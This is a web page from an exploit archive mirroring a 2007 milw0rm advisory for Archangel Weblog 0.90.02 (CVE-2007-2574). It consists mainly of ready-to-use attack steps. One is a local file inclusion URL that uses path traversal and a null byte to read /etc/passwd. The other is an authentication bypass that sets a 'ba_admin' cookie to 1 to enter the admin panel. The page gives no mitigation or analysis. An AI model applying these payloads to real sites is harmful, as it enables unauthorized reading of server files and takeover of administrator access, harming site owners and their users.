[] NeoSense
E X P L O I T S
title author type platform port cve id

Archangel Weblog 0.90.02 - Local File Inclusion / Authentication Bypass

Author: Dj7xpl
type: webapps
platform: php
port: 
date_added: 2007-05-04 
date_updated:  
verified: 1 
codes: OSVDB-41731;CVE-2007-2574 
tags: 
aliases:  
screenshot_url:  
application_url: 
                      \\\|///
                    \\  - -  //
                     (  @ @ )
              ----oOOo--(_)-oOOo--------------------------------------------------
              Portal   :  Archangel Weblog version 0.90.02
	      Home     :  http://www.archangelmgt.com/weblog.shtml
              Download :  http://www.archangelmgt.com/Archangel_Weblog_v090_02.zip
	      Author   :  Dj7xpl / Dj7xpl@2600.ir
	      HomePage :  http://Dj7xpl.2600.ir
	      Type     :  Local File Inclusion & Login Page Bypass By Cookie
              ----ooooO-----Ooooo--------------------------------------------------
                  (   )     (   )
                   \ (       ) /
                    \_)     (_/



+---------------------------------------------------------------------------------------------+

Local File Include :

http://[TARGET]/[PATH]/index.php?index=[Local File]%00
http://Target.com/blog/index.php?index=../../../../etc/passwd%00

+---------------------------------------------------------------------------------------------+


+---------------------------------------------------------------------------------------------+

Edit Cookie :

Host  : Target
Name  : ba_admin
Value : 1      <------ (Admin User Id)

And Go To Admin Panel :

http://[Target]/[Path]/Admin/

+---------------------------------------------------------------------------------------------+

# milw0rm.com [2007-05-05]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.